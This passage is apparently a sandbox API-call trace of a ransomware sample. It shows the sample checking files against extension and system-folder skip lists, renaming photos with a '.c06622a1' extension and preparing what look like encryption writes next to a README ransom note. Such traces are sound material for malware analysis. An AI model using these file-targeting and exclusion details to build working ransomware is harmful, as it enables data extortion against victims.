wcslen (_String="sys") returned 0x3 [0167.826] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0167.826] wcslen (_String="theme") returned 0x5 [0167.826] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0167.826] wcslen (_String="themepack") returned 0x9 [0167.826] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0167.826] wcslen (_String="wpx") returned 0x3 [0167.826] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0167.826] wcslen (_String="lock") returned 0x4 [0167.826] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0167.826] wcslen (_String="key") returned 0x3 [0167.826] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0167.826] wcslen (_String="hta") returned 0x3 [0167.826] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0167.826] wcslen (_String="msi") returned 0x3 [0167.826] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0167.826] wcslen (_String="pdb") returned 0x3 [0167.826] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0167.826] wcslen (_String="sqlite") returned 0x6 [0167.826] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r")) returned 0x10 [0167.826] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0167.826] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R" [0167.826] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R") returned 0x34 [0167.826] wcscpy (in: _Dest=0x32400ca, _Source="Miwvk.jpg" | out: _Dest="Miwvk.jpg") returned="Miwvk.jpg" [0167.826] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\Miwvk.jpg", dwFileAttributes=0x80) returned 1 [0167.827] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\Miwvk.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r\\miwvk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0167.827] SetFilePointerEx (in: hFile=0x1b8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.827] ReadFile (in: hFile=0x1b8, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0167.828] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x22f946ee [0167.828] RtlComputeCrc32 (PartialCrc=0x46ee, Buffer=0x32e9a4, Length=0x80) returned 0x3b4aa807 [0167.828] RtlComputeCrc32 (PartialCrc=0xa807, Buffer=0x32e9a4, Length=0x80) returned 0xe89ba5a2 [0167.828] RtlComputeCrc32 (PartialCrc=0xa5a2, Buffer=0x32e9a4, Length=0x80) returned 0x49b85b01 [0167.828] RtlComputeCrc32 (PartialCrc=0x5b01, Buffer=0x32e9a4, Length=0x80) returned 0x3ee7a0c5 [0167.828] CloseHandle (hObject=0x1b8) returned 1 [0167.828] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0167.828] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\Miwvk.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\Miwvk.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\Miwvk.jpg" [0167.828] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\Miwvk.jpg") returned 0x3e [0167.828] wcscpy (in: _Dest=0x32500e4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.828] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\Miwvk.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r\\miwvk.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\Miwvk.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r\\miwvk.jpg.c06622a1"), dwFlags=0x8) returned 1 [0167.831] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\Miwvk.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r\\miwvk.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1b8 [0167.831] CreateIoCompletionPort (FileHandle=0x1b8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0167.831] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3a70020 [0167.840] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x34bacd88 [0167.840] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5e12f0cb [0167.840] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2fdd289 [0167.840] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x290c0c90 [0167.840] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1d6d9fb0 [0167.840] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1ad21aed [0167.840] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x487019a5 [0167.840] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7d199d96 [0167.843] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3a70094, Length=0x80) returned 0x3cb3bdf2 [0167.843] RtlComputeCrc32 (PartialCrc=0xbdf2, Buffer=0x3a70094, Length=0x80) returned 0xa26b4ea1 [0167.843] RtlComputeCrc32 (PartialCrc=0x4ea1, Buffer=0x3a70094, Length=0x80) returned 0xf414002f [0167.843] RtlComputeCrc32 (PartialCrc=0x2f, Buffer=0x3a70094, Length=0x80) returned 0xbaff02bf [0167.843] RtlComputeCrc32 (PartialCrc=0x2bf, Buffer=0x3a70094, Length=0x80) returned 0x40fe23e3 [0167.843] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3a70020) returned 1 [0167.843] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0167.843] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0167.844] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91b66860, ftCreationTime.dwHighDateTime=0x1d6eb2b, ftLastAccessTime.dwLowDateTime=0x91b66860, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x91b66860, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x7ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0167.844] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0167.844] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe5c492f0, ftCreationTime.dwHighDateTime=0x1d5de76, ftLastAccessTime.dwLowDateTime=0x3184d6f0, ftLastAccessTime.dwHighDateTime=0x1d5da17, ftLastWriteTime.dwLowDateTime=0x3184d6f0, ftLastWriteTime.dwHighDateTime=0x1d5da17, nFileSizeHigh=0x0, nFileSizeLow=0xbfb, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aZn-.bmp", cAlternateFileName="")) returned 1 [0167.844] _wcsicmp (_Str1="_aZn-.bmp", _Str2="README.c06622a1.TXT") returned -19 [0167.844] wcsstr (_Str="_aZn-.bmp", _SubStr="README") returned 0x0 [0167.844] _wcsicmp (_Str1="autorun.inf", _Str2="_aZn-.bmp") returned 2 [0167.844] wcslen (_String="autorun.inf") returned 0xb [0167.844] _wcsicmp (_Str1="boot.ini", _Str2="_aZn-.bmp") returned 3 [0167.844] wcslen (_String="boot.ini") returned 0x8 [0167.844] _wcsicmp (_Str1="bootfont.bin", _Str2="_aZn-.bmp") returned 3 [0167.844] wcslen (_String="bootfont.bin") returned 0xc [0167.844] _wcsicmp (_Str1="bootsect.bak", _Str2="_aZn-.bmp") returned 3 [0167.844] wcslen (_String="bootsect.bak") returned 0xc [0167.844] _wcsicmp (_Str1="desktop.ini", _Str2="_aZn-.bmp") returned 5 [0167.844] wcslen (_String="desktop.ini") returned 0xb [0167.844] _wcsicmp (_Str1="iconcache.db", _Str2="_aZn-.bmp") returned 10 [0167.844] wcslen (_String="iconcache.db") returned 0xc [0167.844] _wcsicmp (_Str1="ntldr", _Str2="_aZn-.bmp") returned 15 [0167.844] wcslen (_String="ntldr") returned 0x5 [0167.844] _wcsicmp (_Str1="ntuser.dat", _Str2="_aZn-.bmp") returned 15 [0167.844] wcslen (_String="ntuser.dat") returned 0xa [0167.844] _wcsicmp (_Str1="ntuser.dat.log", _Str2="_aZn-.bmp") returned 15 [0167.844] wcslen (_String="ntuser.dat.log") returned 0xe [0167.844] _wcsicmp (_Str1="ntuser.ini", _Str2="_aZn-.bmp") returned 15 [0167.844] wcslen (_String="ntuser.ini") returned 0xa [0167.844] _wcsicmp (_Str1="thumbs.db", _Str2="_aZn-.bmp") returned 21 [0167.844] wcslen (_String="thumbs.db") returned 0x9 [0167.845] _wcsicmp (_Str1="386", _Str2="bmp") returned -47 [0167.845] wcslen (_String="386") returned 0x3 [0167.845] _wcsicmp (_Str1="adv", _Str2="bmp") returned -1 [0167.845] wcslen (_String="adv") returned 0x3 [0167.845] _wcsicmp (_Str1="ani", _Str2="bmp") returned -1 [0167.845] wcslen (_String="ani") returned 0x3 [0167.845] _wcsicmp (_Str1="bat", _Str2="bmp") returned -12 [0167.845] wcslen (_String="bat") returned 0x3 [0167.845] _wcsicmp (_Str1="bin", _Str2="bmp") returned -4 [0167.845] wcslen (_String="bin") returned 0x3 [0167.845] _wcsicmp (_Str1="cab", _Str2="bmp") returned 1 [0167.845] wcslen (_String="cab") returned 0x3 [0167.845] _wcsicmp (_Str1="cmd", _Str2="bmp") returned 1 [0167.845] wcslen (_String="cmd") returned 0x3 [0167.845] _wcsicmp (_Str1="com", _Str2="bmp") returned 1 [0167.845] wcslen (_String="com") returned 0x3 [0167.845] _wcsicmp (_Str1="cpl", _Str2="bmp") returned 1 [0167.845] wcslen (_String="cpl") returned 0x3 [0167.845] _wcsicmp (_Str1="cur", _Str2="bmp") returned 1 [0167.845] wcslen (_String="cur") returned 0x3 [0167.845] _wcsicmp (_Str1="deskthemepack", _Str2="bmp") returned 2 [0167.845] wcslen (_String="deskthemepack") returned 0xd [0167.845] _wcsicmp (_Str1="diagcab", _Str2="bmp") returned 2 [0167.845] wcslen (_String="diagcab") returned 0x7 [0167.845] _wcsicmp (_Str1="diagcfg", _Str2="bmp") returned 2 [0167.845] wcslen (_String="diagcfg") returned 0x7 [0167.845] _wcsicmp (_Str1="diagpkg", _Str2="bmp") returned 2 [0167.845] wcslen (_String="diagpkg") returned 0x7 [0167.845] _wcsicmp (_Str1="dll", _Str2="bmp") returned 2 [0167.845] wcslen (_String="dll") returned 0x3 [0167.846] _wcsicmp (_Str1="drv", _Str2="bmp") returned 2 [0167.846] wcslen (_String="drv") returned 0x3 [0167.846] _wcsicmp (_Str1="exe", _Str2="bmp") returned 3 [0167.846] wcslen (_String="exe") returned 0x3 [0167.846] _wcsicmp (_Str1="hlp", _Str2="bmp") returned 6 [0167.846] wcslen (_String="hlp") returned 0x3 [0167.846] _wcsicmp (_Str1="icl", _Str2="bmp") returned 7 [0167.846] wcslen (_String="icl") returned 0x3 [0167.846] _wcsicmp (_Str1="icns", _Str2="bmp") returned 7 [0167.846] wcslen (_String="icns") returned 0x4 [0167.846] _wcsicmp (_Str1="ico", _Str2="bmp") returned 7 [0167.846] wcslen (_String="ico") returned 0x3 [0167.846] _wcsicmp (_Str1="ics", _Str2="bmp") returned 7 [0167.846] wcslen (_String="ics") returned 0x3 [0167.846] _wcsicmp (_Str1="idx", _Str2="bmp") returned 7 [0167.846] wcslen (_String="idx") returned 0x3 [0167.846] _wcsicmp (_Str1="ldf", _Str2="bmp") returned 10 [0167.846] wcslen (_String="ldf") returned 0x3 [0167.846] _wcsicmp (_Str1="lnk", _Str2="bmp") returned 10 [0167.846] wcslen (_String="lnk") returned 0x3 [0167.846] _wcsicmp (_Str1="mod", _Str2="bmp") returned 11 [0167.846] wcslen (_String="mod") returned 0x3 [0167.846] _wcsicmp (_Str1="mpa", _Str2="bmp") returned 11 [0167.846] wcslen (_String="mpa") returned 0x3 [0167.846] _wcsicmp (_Str1="msc", _Str2="bmp") returned 11 [0167.846] wcslen (_String="msc") returned 0x3 [0167.846] _wcsicmp (_Str1="msp", _Str2="bmp") returned 11 [0167.846] wcslen (_String="msp") returned 0x3 [0167.846] _wcsicmp (_Str1="msstyles", _Str2="bmp") returned 11 [0167.846] wcslen (_String="msstyles") returned 0x8 [0167.846] _wcsicmp (_Str1="msu", _Str2="bmp") returned 11 [0167.847] wcslen (_String="msu") returned 0x3 [0167.847] _wcsicmp (_Str1="nls", _Str2="bmp") returned 12 [0167.847] wcslen (_String="nls") returned 0x3 [0167.847] _wcsicmp (_Str1="nomedia", _Str2="bmp") returned 12 [0167.847] wcslen (_String="nomedia") returned 0x7 [0167.847] _wcsicmp (_Str1="ocx", _Str2="bmp") returned 13 [0167.847] wcslen (_String="ocx") returned 0x3 [0167.847] _wcsicmp (_Str1="prf", _Str2="bmp") returned 14 [0167.847] wcslen (_String="prf") returned 0x3 [0167.847] _wcsicmp (_Str1="ps1", _Str2="bmp") returned 14 [0167.847] wcslen (_String="ps1") returned 0x3 [0167.847] _wcsicmp (_Str1="rom", _Str2="bmp") returned 16 [0167.847] wcslen (_String="rom") returned 0x3 [0167.847] _wcsicmp (_Str1="rtp", _Str2="bmp") returned 16 [0167.847] wcslen (_String="rtp") returned 0x3 [0167.847] _wcsicmp (_Str1="scr", _Str2="bmp") returned 17 [0167.847] wcslen (_String="scr") returned 0x3 [0167.847] _wcsicmp (_Str1="shs", _Str2="bmp") returned 17 [0167.847] wcslen (_String="shs") returned 0x3 [0167.847] _wcsicmp (_Str1="spl", _Str2="bmp") returned 17 [0167.847] wcslen (_String="spl") returned 0x3 [0167.847] _wcsicmp (_Str1="sys", _Str2="bmp") returned 17 [0167.847] wcslen (_String="sys") returned 0x3 [0167.847] _wcsicmp (_Str1="theme", _Str2="bmp") returned 18 [0167.847] wcslen (_String="theme") returned 0x5 [0167.847] _wcsicmp (_Str1="themepack", _Str2="bmp") returned 18 [0167.847] wcslen (_String="themepack") returned 0x9 [0167.847] _wcsicmp (_Str1="wpx", _Str2="bmp") returned 21 [0167.847] wcslen (_String="wpx") returned 0x3 [0167.847] _wcsicmp (_Str1="lock", _Str2="bmp") returned 10 [0167.848] wcslen (_String="lock") returned 0x4 [0167.848] _wcsicmp (_Str1="key", _Str2="bmp") returned 9 [0167.848] wcslen (_String="key") returned 0x3 [0167.848] _wcsicmp (_Str1="hta", _Str2="bmp") returned 6 [0167.848] wcslen (_String="hta") returned 0x3 [0167.848] _wcsicmp (_Str1="msi", _Str2="bmp") returned 11 [0167.848] wcslen (_String="msi") returned 0x3 [0167.848] _wcsicmp (_Str1="pdb", _Str2="bmp") returned 14 [0167.848] wcslen (_String="pdb") returned 0x3 [0167.848] _wcsicmp (_Str1="sqlite", _Str2="bmp") returned 17 [0167.848] wcslen (_String="sqlite") returned 0x6 [0167.848] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r")) returned 0x10 [0167.848] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3240060 [0167.848] wcscpy (in: _Dest=0x3240060, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R" [0167.848] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R") returned 0x34 [0167.848] wcscpy (in: _Dest=0x32400ca, _Source="_aZn-.bmp" | out: _Dest="_aZn-.bmp") returned="_aZn-.bmp" [0167.848] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\_aZn-.bmp", dwFileAttributes=0x80) returned 1 [0167.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\_aZn-.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r\\_azn-.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0167.849] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0167.849] ReadFile (in: hFile=0x1f0, lpBuffer=0x32e9a4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ea34, lpOverlapped=0x0 | out: lpBuffer=0x32e9a4*, lpNumberOfBytesRead=0x32ea34*=0x90, lpOverlapped=0x0) returned 1 [0167.850] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32e9a4, Length=0x80) returned 0x73daed0b [0167.850] RtlComputeCrc32 (PartialCrc=0xed0b, Buffer=0x32e9a4, Length=0x80) returned 0xc25661b [0167.850] RtlComputeCrc32 (PartialCrc=0x661b, Buffer=0x32e9a4, Length=0x80) returned 0x69463e51 [0167.850] RtlComputeCrc32 (PartialCrc=0x3e51, Buffer=0x32e9a4, Length=0x80) returned 0x180efb90 [0167.850] RtlComputeCrc32 (PartialCrc=0xfb90, Buffer=0x32e9a4, Length=0x80) returned 0xec5c99aa [0167.850] CloseHandle (hObject=0x1f0) returned 1 [0167.850] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3250068 [0167.850] wcscpy (in: _Dest=0x3250068, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\_aZn-.bmp" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\_aZn-.bmp") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\_aZn-.bmp" [0167.850] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\_aZn-.bmp") returned 0x3e [0167.850] wcscpy (in: _Dest=0x32500e4, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0167.850] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\_aZn-.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r\\_azn-.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\_aZn-.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r\\_azn-.bmp.c06622a1"), dwFlags=0x8) returned 1 [0167.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\XGqrhHf_R\\_aZn-.bmp.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\xgqrhhf_r\\_azn-.bmp.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1f0 [0167.853] CreateIoCompletionPort (FileHandle=0x1f0, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0167.853] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3b00020 [0167.861] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x10e66258 [0167.861] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3de4ed1e [0167.861] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x19f99c5d [0167.861] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x225c8601 [0167.861] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4fcd1591 [0167.861] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x573d2d91 [0167.861] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5a676849 [0167.861] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x32c1fbd7 [0167.865] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3b00094, Length=0x80) returned 0xca325238 [0167.865] RtlComputeCrc32 (PartialCrc=0x5238, Buffer=0x3b00094, Length=0x80) returned 0xf3f7be02 [0167.865] RtlComputeCrc32 (PartialCrc=0xbe02, Buffer=0x3b00094, Length=0x80) returned 0x8950cba2 [0167.865] RtlComputeCrc32 (PartialCrc=0xcba2, Buffer=0x3b00094, Length=0x80) returned 0x58c984af [0167.865] RtlComputeCrc32 (PartialCrc=0x84af, Buffer=0x3b00094, Length=0x80) returned 0x2098357f [0167.865] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3b00020) returned 1 [0167.865] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3240060) returned 1 [0167.865] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3250068) returned 1 [0167.865] FindNextFileW (in: hFindFile=0x154188, lpFindFileData=0x32eb1c | out: lpFindFileData=0x32eb1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0167.865] FindClose (in: hFindFile=0x154188 | out: hFindFile=0x154188) returned 1 [0167.865] _wcsicmp (_Str1="backup", _Str2="XGqrhHf_R") returned -22 [0167.865] wcslen (_String="backup") returned 0x6 [0167.865] _wcsicmp (_Str1="bak", _Str2="XGqrhHf_R") returned -22 [0167.865] wcslen (_String="bak") returned 0x3 [0167.865] _wcsicmp (_Str1="back", _Str2="XGqrhHf_R") returned -22 [0167.865] wcslen (_String="back") returned 0x4 [0167.865] _wcsicmp (_Str1="archive", _Str2="XGqrhHf_R") returned -23 [0167.865] wcslen (_String="archive") returned 0x7 [0167.866] _wcsicmp (_Str1="bckp", _Str2="XGqrhHf_R") returned -22 [0167.866] wcslen (_String="bckp") returned 0x4 [0167.866] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3480048) returned 1 [0167.867] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0167.867] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x55088ea0, ftCreationTime.dwHighDateTime=0x1d5d9e5, ftLastAccessTime.dwLowDateTime=0xbc4108b0, ftLastAccessTime.dwHighDateTime=0x1d5e77b, ftLastWriteTime.dwLowDateTime=0xbc4108b0, ftLastWriteTime.dwHighDateTime=0x1d5e77b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YiCZnZd3WoEZPYnVg", cAlternateFileName="YICZNZ~1")) returned 1 [0167.868] _wcsicmp (_Str1="$recycle.bin", _Str2="YiCZnZd3WoEZPYnVg") returned -85 [0167.868] wcslen (_String="$recycle.bin") returned 0xc [0167.868] _wcsicmp (_Str1="config.msi", _Str2="YiCZnZd3WoEZPYnVg") returned -22 [0167.868] wcslen (_String="config.msi") returned 0xa [0167.868] _wcsicmp (_Str1="$windows.~bt", _Str2="YiCZnZd3WoEZPYnVg") returned -85 [0167.868] wcslen (_String="$windows.~bt") returned 0xc [0167.868] _wcsicmp (_Str1="$windows.~ws", _Str2="YiCZnZd3WoEZPYnVg") returned -85 [0167.868] wcslen (_String="$windows.~ws") returned 0xc [0167.868] _wcsicmp (_Str1="windows", _Str2="YiCZnZd3WoEZPYnVg") returned -2 [0167.868] wcslen (_String="windows") returned 0x7 [0167.868] _wcsicmp (_Str1="appdata", _Str2="YiCZnZd3WoEZPYnVg") returned -24 [0167.868] wcslen (_String="appdata") returned 0x7 [0167.868] _wcsicmp (_Str1="application data", _Str2="YiCZnZd3WoEZPYnVg") returned -24 [0167.868] wcslen (_String="application data") returned 0x10 [0167.868] _wcsicmp (_Str1="boot", _Str2="YiCZnZd3WoEZPYnVg") returned -23 [0167.868] wcslen (_String="boot") returned 0x4 [0167.868] _wcsicmp (_Str1="google", _Str2="YiCZnZd3WoEZPYnVg") returned -18 [0167.868] wcslen (_String="google") returned 0x6 [0167.868] _wcsicmp (_Str1="mozilla", _Str2="YiCZnZd3WoEZPYnVg") returned -12 [0167.868] wcslen (_String="mozilla") returned 0x7 [0167.868] _wcsicmp (_Str1="program files", _Str2="YiCZnZd3WoEZPYnVg") returned -9 [0167.868] wcslen (_String="program files") returned 0xd [0167.868] _wcsicmp (_Str1="program files (x86)", _Str2="YiCZnZd3WoEZPYnVg") returned -9 [0167.868] wcslen (_String="program files (x86)") returned 0x13 [0167.868] _wcsicmp (_Str1="programdata", _Str2="YiCZnZd3WoEZPYnVg") returned -9 [0167.868] wcslen (_String="programdata") returned 0xb [0167.868] _wcsicmp (_Str1="system volume information", _Str2="YiCZnZd3WoEZPYnVg") returned -6 [0167.868] wcslen (_String="system volume information") returned 0x19 [0167.868] _wcsicmp (_Str1="tor browser", _Str2="YiCZnZd3WoEZPYnVg") returned -5 [0167.868] wcslen (_String="tor browser") returned 0xb [0167.869] _wcsicmp (_Str1="windows.old", _Str2="YiCZnZd3WoEZPYnVg") returned -2 [0167.869] wcslen (_String="windows.old") returned 0xb [0167.869] _wcsicmp (_Str1="intel", _Str2="YiCZnZd3WoEZPYnVg") returned -16 [0167.869] wcslen (_String="intel") returned 0x5 [0167.869] _wcsicmp (_Str1="msocache", _Str2="YiCZnZd3WoEZPYnVg") returned -12 [0167.869] wcslen (_String="msocache") returned 0x8 [0167.869] _wcsicmp (_Str1="perflogs", _Str2="YiCZnZd3WoEZPYnVg") returned -9 [0167.869] wcslen (_String="perflogs") returned 0x8 [0167.869] _wcsicmp (_Str1="x64dbg", _Str2="YiCZnZd3WoEZPYnVg") returned -1 [0167.869] wcslen (_String="x64dbg") returned 0x6 [0167.869] _wcsicmp (_Str1="public", _Str2="YiCZnZd3WoEZPYnVg") returned -9 [0167.869] wcslen (_String="public") returned 0x6 [0167.869] _wcsicmp (_Str1="all users", _Str2="YiCZnZd3WoEZPYnVg") returned -24 [0167.869] wcslen (_String="all users") returned 0x9 